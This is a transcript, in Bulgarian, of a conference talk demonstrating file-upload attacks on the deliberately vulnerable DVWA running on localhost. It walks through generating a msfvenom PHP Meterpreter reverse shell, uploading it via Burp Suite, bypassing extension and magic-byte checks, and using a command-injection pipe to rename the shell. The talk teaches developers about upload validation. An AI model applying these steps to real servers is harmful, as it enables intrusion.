Дали се вижда? Окей, супер. Добре. Сега, разбира се, няма да атакуваме истински уебсайт, защото е незаконно, ако нямаме тяхното разрешение, разбира се. Затова ще си правя демонстрациите с инструмент, който е, казва се DM Vulnerable Web Application. Буквално означава това, което звучи. Нарочно, умишлено уязвима веб апликация, която върви на localhost, която може точно да бъде използвана за такива цели на демонстрацията. Тя върви на... Само да си пуснем сервиза. Така, виждате ли добре терминала? Окей. Sudo service, аз ще говоря все пак, за да го валидираме и това, което казвам и това, което го виждаме. Sudo service Apache 2 start. С това нещо стартираме Apache сървъра, за да може да си ръмваме при нас на локалната машина въпросната веб апликация. Също ще ни трябва sudo service MySQL да стартираме. И в момента, в който сме стартирали двата сервиза, можем просто да избраузим HTTP на localhost DM Vulnerable Web Application. И той не е достъпен. Да, защото съм активирал всъщност. Ето го въпросната приложение add-on Foxy Proxy. Сега в случая ще изключа проксирането през Burpsuit, тъй като още не съм го активирал. Това просто го изключваме, за да може да ви покажа самата апликация. Това е ужасно уязвимата DM Vulnerable Web апликация. Сега ще изпълняваме всъщност атаките в файл upload. Казахме какво друго ни трябва. Трябва ни, освен уязвима апликация, освен въпросният екстеншън, трябва ни Burpsuit. Burpsuit Community Edition. Разбира се, това не е време, в което да ви, да имаме време. Аз мога но нямам да имаме време да минавам през всичките настройки на Burpsuit, да ви разказвам кое къде и така нататък, но много набързо. Fast Track трябва ни прокси. В Proxy Settings, както виждате, настроил съм всъщност да ми проксира трафика на localhost 127.0.0.1 на порт 80.80. Така че след като съм направил тази настройка, вече мога да си активирам и Burpsuit да ми проксира трафика. Сега, какво означава да проксира Burpsuit трафика? Например, ако в момента се опитам да избрал за ABVBG, както виждате, добре, така мога, защото не го бях пуснал. Да, тук трябва да пусна и да интерсепвам трафика. И ако сега се опитам да избрал за DIRBG, няма да мога да го направя. В момента буферира, опитва се да достъпи въпросния сайт. Защо няма да може? Защото Burpsuit е станал по средата между моя браузър и между веб апликацията. И както виждате, в момента изпращам get заявка, именно към въпросния сайт. Ще я форвардна. Както виждате, през различни итерации на форвардване, всъщност по този начин ето, опитвам се да достъпя DIRBG като хост и едва след като форвард на целият трафик с различните ресурси на веб апликацията, даже буквално направо ще го спра, за да може да ми го мине, чак тогава успявам да видя въпросния сайт. Така, по този начин всъщност ви показвам как Burpsuit на практика следи и слуша трафика между вашия браузър и между апликацията. Затваряме го, защото не ни трябва. Отново ще го пуснем. И сега, трябва да качим колко сайтове познавате, в които има функцията за аплодване на нещо, на файл. Много. Най-малкото за профилна снимка може да си аплоднеш, да си приличиш някаква сметка, каквото си представите хора. Тоест, това е много често срещана уязвимост. Не е нещо, затова опитах се да избера нещо, което да е много близко до вас. Тоест, самите вие, пак казвам, ако се занимавате с девелопмент на веб апликация, самите вие знаете колко често дава възможност да се аплодва някакъв файл. Снимка или whatever, каквото и да било. Така че, какво прави хакер в случая?
Какво прави в случая хакера? Трябва да прикачи въпросното нещо. Това, което ще прикачим, се нарича shell. Тоест, то е този тунел между нас и между уязвимата апликация. Сега, за целта трябва да си го създадем. Как създава такъв shell? С Metasploit. Отваряме Metasploit. Всъщност Metasploit е фреймворк. Това означава няколко различни апликации вътре. Една от апликациите, за която в момента всъщност с нея ще започнем, се казва MSF Venom, т.е. отрова. Ние ще създадем отровата, с която да може да създадем този shell и да заразиме, иначе казвам, апликацията. MSF Venom, както го чувате като команда, ако просто го изпишете така, ще ви покажа, разбира се, менюто, какво предлага да си зададете като отрова. Обърнете внимание на имате лист. Ако не знаете какво точно си направите, може да ви помогне. И това ще направим MSF Venom минус L като лист и ще изпишеме. Тук, разбира се, Kali е доста интуитивна платформа и въобще самите апликации много ви подсказват. Типовете, вижте, list all modules са payload, енкодери, nobs, платформи и така нататък. И искаме в случая да листнем всичките payload. Така. Малко ще забавяме, тъй като в момента буквално ще ни покаже много голям лист от payload, над 1000. Ще ни зареди в реално време. Пак казвам, не е част по MSF Venom и въобще по Metasploit, за да минавам през всеки един от тези payload. Така че по-скоро само да ви покажа как ще заради payload-ите. След малко ще ви навигирам вашето внимание към конкретен payload, който ще ни трябва. Take some time. Ето ги. Ако минем с мишката скролър, ще видите всъщност наистина, че са хиляди. Така, какво може да направим в Kali Linux, въобще в Unix средата? Знаете, може да направим pipe и да грепнем по думата PHP. Тоест търсиме някакъв, очевидно да направим shell, отрова, с който да можем да създадем shell, който да качиме на един PHP написан вебсайт. И след малко ще ни отведе на правилните резултати. Тук забелязвам двама-трима от вас клатите главата така одобрително. Явно ви харесва на другите, извинявам се, ако не е чак толкова интересно, но мисля, че трябва да е интересно. Стига. Ето какво имаме в менюто за създаване на отровите. MetaPreter е специален shell тунел, платформа, с която изграждаме всъщност има тази връзка между нашата Metasploit конзола и между заразената апликация. Тоест, очевидно ни трябва PHP, MetaPreter сесия и ни трябва Reverse TCP. Тоест, ние ще се опитаме да направим, като заразиме тази апликация, да обърнем Reverse TCP сесия, да вдигнем към нашия агент. Така че, фокусираме се именно върху именно този payload. PHP, MetaPreter, Reverse TCP. И сега, какво правиме? Малко давам на fast forward, защото наистина много ще забавя, ако обяснявам всяко едно от минутата, но MSF Venom минус P и изписваме payload, който е ето този. Копирам се го за всеки случай. След което трябва да направим lhost. Какво означава lhost? Listening host. Тоест това ще бъде хоста, на който ние ще слушаме. В случая сме localhost. lhost е равно на 127.0.0.1. Интервал lport е listening port, пък на кой порт ще слушаме. Равно на 4444, измислям си някакъв. Минус F stands for format. И му казваме да бъде row, т.е. груп, неконструиран формат. И това нещо ще го аутпутнем на нашия desktop home LT desktop и ще го кръстим shell 1.php. Така че това изглежда всъщност командата. Повтарям отново, MSF Venom, създай ми такава отрова за payload
PHP Meter Pret Reverse TCP, където ще слушаме на локалният ни хост с Listening Port 4444 -F е формата RAW и това нещо го служи на десктопа. Екзекютваме командата и ни казва, че е създаден payload с 1110 байта на нашия десктоп. Ако отидем в момента на нашия десктоп, ще видим, че ето го въпросното шелче PHP. Ако ви е интересно какво представлява, разбира се, че може да го видим. cat home lt shell 1 PHP. Това всъщност представлява въпросната отро. Въпросния shell, с който ще заразим и ще направим връзката с нашата машина. Добре, направихме си отровата, сега трябва да я качим в апликацията. Сложили сме интерсепшването на on, отиваме на апликацията и му казваме browse. На десктопа качим и този shell 1 PHP. Само да съм пуснал пак интерсептора. Да го махна. Така, on. Добре. Казваме му OK. Upload. Не се аплоудва допреди да потвърдиме това нещо. Разбира се, и в момента какво имаме? Burp ни казва: опитваш се да направиш post requests към DVWA Vulnerability Upload и се опитваш да качиш shell 1 PHP и въпросния shell, който преди малко видяхме. Съгласни ли сме? Съгласни сме. Forward. Хоп! И ни каза successfully uploaded shell на // hackable uploads shell 1 PHP. Качихме shell без никаква проверка. Тоест това е първото ниво, в което показваме една web апликация, която е тотално уязвима, при която не прави никаква проверка какво точно прикачаш. И не е че казано, ти пишеш на потребителя, качи си твоя профилна снимка, ама хакера нарочно гледа да се опита да манипулира това, което му казваш. И ти може като девелопър да очакваш, че човека от друга страна ще бъде добронамерен и ще си качи профилна снимка, ама реално вместо профилна снимка в случая някой си качи shell. Сега, за да покажем всъщност самата атака, нали, как ние имаме достъп вътре, трябва да стартираме и самият Metasploit. Ще изчиста малко, за да е по-чистичко. MSF Console е другата апликация от Metasploit фреймворка, с която на практика ще използваме, за да направим тази интеграция между двете апликации. Тук пак имаме много експлойти, давам го малко fast forwarding, защото наистина нямам време, аз като гледам как вървим. Командата директно use multi-handler. Какво е multi-handler? Listener. Ще сдигнем някакъв listener. Use multi-handler. Сетваме му payload да бъде payload да ни бъде PHP Meter Pret Reverse TCP. Сетваме му lhost listening host да бъде 127.0.0.1. Сетваме му и listening порта да бъде 4444 и му казваме run. И в момента стартирахме listener. Това означава, че в момента, в който някой ми е активирал ваш шелче там, където качихме на апликацията, аз ще направя връзката с мене като хакер. Как в момента можем да активираме шела? Като го избраузим. И сега, ние знаеме къде е качен. Hackable exploits, hackable uploads shell 1 PHP. Тоест, просто навигираме до HTTP localhost then vulnerable web application наклонена hackable наклонена uploads наклонена shell 1.php. Трябва да спрем burp сута да интерсепва, тъй като вече искаме да тестваме. И тук ще отворя страни да видите Metasploit. Отново обърнете внимание, стартирали сме такъв listener в момента на този порт и при браузването на този shell, както виждате, почваме да буферираме, нищо не се случва, само че само така си мислите вие. Реално това, което се случва за хакера, току-що си вдигна една сесия. Тоест току-що хакера в момента придоби достъп до
web сервера. Не до web апликацията, а до web сервера директно, тъй като Shell е качен на web сервера. И сега ще кажете, какво толкова? Какво може да стане с това? И аз сега да ви покажа. Първата стъпка. Да видите къде сте сега че качили. Командата е sysinfo. Да видите на каква система сте се качили. Мисля, че сте се качили на Kali, Linux и така нататък. И сега, това на практика представлява Shell, който вие все едно сте в този сървър. Тоест, какво може да правите, ако сте на един сървър и имате отворен терминал? Всичко. Може да пуснете LS, лист, да видите къде в момента се намирате. И ето, виждате в момента в листа, че има Shell 1 PHP и даже някакъв друг там email PNG има нещо си. Може ли да се месите между директориите? Може. CD, ls, вече сме в някаква друга директория. Къде? PWD. Казвам в коя директория. И така нататък и така нататък. Тоест в момента мога да качвам файлове, мога да свалям файлове, всичко. Така. Това беше първата ситуация, при която нямаме никаква проверка на web апликацията. Сега да дигнем малко нивото. Тук сега ще го екзекютнем. Ще екзитнем сесията. И отиваме, тук ще смениме на Web Application Security, ще кажем нещо все пак да показваме, нали, добавената стойност на файла upload. Ако в момента видите view source, ето как изглежда всъщност кода на една такава уязвима апликация. Така без мишка е трудно, ама. Или иначе казано, general, просто има ли прикачен файл, каквото и да е, просто го качваме. Никаква проверка няма. Така. Тук няма да отделям повече време. Аз колко трябваше да приключа сега, нали? Без 10? Добре. Айде само второто ниво да ви покажа. За трето няма да имам време, очевидно, само второто. Така. Вдигаме нивото с... Правиме го на medium. Някой път до година ще ме поканат пак организаторите, за да ви покажа и за high. Така, вдигаме го вече на medium нивото. Отиваме на файл upload. И сега. Какво трябва да направим в случая? Пак да качим въпросния Shell. За да покажем все пак разликата, просто ще го прекръстя на Shell 2. Така, и отново имаме пак интерсепването on. Отиваме си на браузване. Shell 2 ще опитаме да качиме. Да, точно така. И сега, ако се опитаме да го аплоднем, какво ни казва Burpsuite? Някой тук се опитва да аплодне, така, Shell 2, PHP, ето го въпросния Shell. Форвардваме ли го? Forward. Да, обаче моята снимка не е качена, защото акцептваме само JPEG или PNG файлове. Тоест аз не мога да кача файл с такова разширение. И затова какво ще направим в момента? Ще го прекръстим, като сменим екстеншъна. Очевидно апликацията не иска да е JPEG. И отново ще отидем да го качиме този файл. Качваме Shell 2 JPEG, Open, Upload. Само че това, че аз съм го вече подал на web апликацията като JPEG, не означава, че не мога да го смена по пътя ти към веб сървъра. И това точно ни помага Burpsuite. Като това именно е неговата сила, че в реално време ти можеш да промениш всъщност самия стринг на заявката. И тук директно в кода променям PHP. И го изпращам по този начин всъщност към сървъра вече. Тоест, минала е първата проверка на веб апликацията, иска JPEG, JPEG, обаче към сървъра реално изпращам вече, като е минала първата проверка, изпращам реално PHP. И Shell си се качи. Как изглежда тази тип проверка на ViewSource, което е важно за вас като хора, които се занимавате с... трябва да изключа тук интерсепването. Ето ви в момента и как изглежда как изглежда въпросната проверка. Да видя, че аз не мога да гледам там. Така. Да, if uploaded type е image, тогава вече го допусни. Някаква такава basic проверка вече виждаме на следващото ниво.
Тоест, вие като девелопери са, нали, ето виждате как реално какво прави хакера. Казвате му проверката да е, все пак провери този файл, нали, очаквам да е image, някаква снимка, за профилната снимка. Слагате си му да прави проверка за файл тайпа да е image, тарема хакера, пак го заобикаля това нещо. И тогава вече, на третото ниво, девелопери трябва да сложат по-солидната проверка. И каква е по-солидната проверка? Не знам, Тони, ти кажи, продължаваме ли да спирам? Много ли сме? 5 минути си да. 5 минутки. Добре, ще опитам съм мега бърз. А? А тя от Пловдив, между другото. Така че да. Нищо, някъде, тя знае, че съм тук. Така, какво правихме? Да, третата проверка. Отиваме сега, променяме на High. И сега да се опитаме да направим пак същото. Ще смениме тук extension, не extension, това да е Shell 3 да се казва, за да има разлика да виждате как всъщност се променят нещата. Така, и се опитвам в момента да си качиме въпросното Shell 3. Ето, нищо не съм променял. JPEG е. Така, качваме го като JPEG. Тук пуснали съм интерсепването. On. Прикачваме го. Сега опитваме се да направим пак същите магерии. И слагаме тук PHP. Forward. Да, ама не. Казва ни, sorry, ама не може, искаме само JPEG. Тоест в момента не проверяваме само екстеншъна и проверяваме нещо друго. Обаче въпреки това хакерите и това могат да го заобиколят. Сега какво правим ние? Как може да се заобиколи това нещо? Обяснявам, при този третата тип проверка всъщност вече апликацията не гледа просто файл нейма и екстеншъна, ами гледа вътре самия хекс. Тоест сигнатурата, самия файл вътре само по себе си. И тъй като очевидно трябва да качиме нещо, което да изглежда като снимка, ние какво ще направим? Ще направим shell, който обаче изглежда като снимка. Или иначе казано, апликацията като започва да чете вътре самата файлова сигнатура, тя започва да чете отгоре надолу вътре самия текст в файла. Между другото, това е разликата как Kali Linux, например, и въобще и Linux дистрибуциите се ориентират какъв е файла, не по екстеншъна, защото Windows, като сложиш .doc и го отваря с doc, с Word, извинявайте. Тоест той гледа по екстеншъна, докато в Linux средата те не гледат екстеншъна. Linux дистрибуциите гледат вътре самата сигнатура на файла и по това се ориентират как да го отворят като апликация. Тоест ти да му сложиш JPEG, той ще го отвори като документ, ако е документ наистина. Та, за целта ние трябва да направим сега shell, който обаче изглежда като снимка. И как става това нещо? Ми като отгоре на топа на shell сложим нещо, едно кодче, което да накара апликацията да мисли, че това всъщност е снимка. Long story short, няма да имам време да ви покажа това цялото нещо, но това, което ще сложим е, ето сега ви показвам една тарикатлъщина. Ако отидем в интернет и напишеме файл signature. На файл signature, ако отида, например, GIF файлове, ето това нещо ни трябва. Пак казвам, нямам време сега да го обясняваме, но това нещо, ако го сложим на топа на shell-а, той за пред апликация ще изглежда, че всъщност е GIF файл, а не shell. Копираме си го това нещо, отиваме, ще смениме nano home lt desktop, как се казва, shell 3. Така. И тук само в началото, не, всъщност тук ще ми е трудно да го смена, с Gedit ще го смена. Бърза максимално, Gedit shell 3.php, така. И му слагам отгоре едно, ето това нещо. И така. Отдолния шела, отгоре му слагаме да изглежда като маска, като снимка. Сейфаме го това нещо. Отвръщаме се обратно тук. Казваме му Browse, качим и Shell 3. Окей, Upload. Тук му казваме
Така, Shell 3 JPEG се опитва. Forward. Вуаля! Снимката е качена. Къде обаче сега е проблема? Проблемът е, че ние сме качили снимка. Тоест не можем да избраузиме тази снимка, тъй като тя е текст. Тоест ако просто хитнем този файл в браузъра, няма да ни активира сесията. Да го покажем. Стартираме MSF Console. Междувременно навигирам до HTTP, localhost, damn vulnerable web application, наклонена hackable, наклонена uploads, наклонена shell 3.jpg. И ако се тук това ми е да го офна, така, use multi handler set payload ни е PHP, наклонена metapreter, наклонена reverse TCP. Set listening host да ни е 127.0.0.1, set listening port да ни е 4444 и му казваме exploit. И в момента, в който хитнем този shell 3, казване the image cannot be displayed, не може да се дисплейне, в същото време не може да се стартира и сесията. Обаче трябва да направим нещо, с което да промениме някакси, трябва да бръкнем в апликацията, така че да може да сменим този extension, да не е JPEG, а да е PHP. Приключвам ли? Добре. Другия път. Чакай сега, тогава да сменим само. Айде, 5-10 минути. Без въпроси обаче. Добре. Хора, сори, опитвах се максимално бързо, ама така. Добре, значи така, виждате ли какво виждате? Нищо не виждате. Добре. Докъде стигнахме? Така, качихме шела горе, т.е. JPEG, така. Трябва сега да го пребрандираме. Някакси трябва да му направим да е PHP, да му сменим екстеншъна. И сега какво правим? Out of the box. Значи трябва да имаш outside of box thinking. И хакери това правят, нали? Като не може през едно нещо, опитваш някакъв друг вектор. И се разхождат по апликацията. И като не можеш тук да пробиеш, ще разходиш някъде друга. Да и кажеш, ще разходим да спеста времето за обяснение, ще разходим на command injection. Сега тук има една команда за един ping a device. И да, вие ме примерно какво ще стане, ако пингне Cloudflare. Просто е така, тестване. Виждате, апликацията очаква пинг на IP адрес. И ни казва, пингването, цък, хост е жив, reachable е, всичко е файн. Обаче знаете, че в командата може да пайпнем и да изпълним, освен тази команда, и нещо друго. Да, вие имаме сега тази уязвимост. Тоест, пак сме 8. Това като на времето имаше една така песен 8 часа 8. И сложим тук сега един пайп. Не мога да виждам. Така, пайп слагаме. PWD. PWD ни показва print where директорията, къде сме в момента. Так, print working directory. И ако го изпълним по този начин. Значи, даваме си IP адреса, който апликацията очаква, значи го пайпваме и слагаме и още една команда да изпълни. И да сега дали ще сработи това нещо. Много яко. Значи, мина първата команда, пинкна там Cloudflare, обаче освен това в момента ни показа и ни изпринти working directory-то. Тоест в момента буквално ни показва web апликацията, къде се намираме в момента. Което, какво означава това? Ми означава, че аз в момента мога да интерактвам с тази апликация, да й подавам и други команди и да сменям нещо. И това, което всъщност ще й подам като команда, да ми смени екстеншън на въпросния файл. Или, иначе казано, как изглежда това като команда? Изглежда 8888. Така, pipe. И сега тук малко трябва. Това е вече за много високо ниво, нали? Ще го разберете със сигурност, но трябва наистина така опит, за да стигнете до там. Казваме CP, копирай, копи. Къде се намираме ние в момента? Ние се намираме тук, в Hackable Uploads. Помните как качвахме тук в бърбството ни го казва това нещо. Това се стрил. В ./hackable uploads. Така. И с това му казваме. Копирай ми ./hackable наклонена uploads
наклонена shell 3.jpg. Така, копирай ми, или даже може да не е копия, може да е move. Командата вместо cp може да е mv, директно rename. В Linux средата mv е rename всъщност, move. Така, мувни ми, или иначе казвам, премести ми dot// директорията hackable uploads shell 3 и ми го направи в пак dot// hackable наклонена uploads наклонена shell 3.php обаче. И сега за да ви го покажа да е още по-яко, директно ще отидем в самата директория, да видите как в реално време ще го смени това нещо. Така, var www.html then vulnerable hackable uploads. Така. Ние не сме... ето го shell 3. Да. Ето ни го shell 3 JPEG, нали така? И сега, в момента, в който виждаме го тук, изпълняваме командата. Вече е shell 3 PHP. От тук нататък нещата са лесни. Чака ни тук listener. Тук е това, което трябва да направим, е просто да избраузим. HTTP localhost наклонена then vulnerable web application наклонена какво беше вече са hackable hackable uploads наклонена shell 3.php и си имаме сесия. Welcome to the jungle. Това, което всъщност е за вас, оставям ви го, вие да си го направите за домашно. Ако отворите тук ViewSource, всъщност на ViewSource може да видите каква вече проверка се изпълнява, т.е. какво трябва вие като девелопери да направите, така че да може да мейкнете sure, че наистина ще качите файл, който е наистина снимка и така нататък. Добре, тук само имам един слайд, в който в общи линии. Нали? Така, 3, 2, 1 и тук е момента, в който Q&A прескачаме. Тук е моята визитка. Между другото, намерете ме в LinkedIn, много се радвам на приятели, на фолуъри, така че нека сме конектнати. Ако има нещо, винаги може да питате. Аз обичам да съм много ментор, така че някой пита кой сертификат и какво ще, така че пишете ми там. И в общи линии ви благодаря. Да.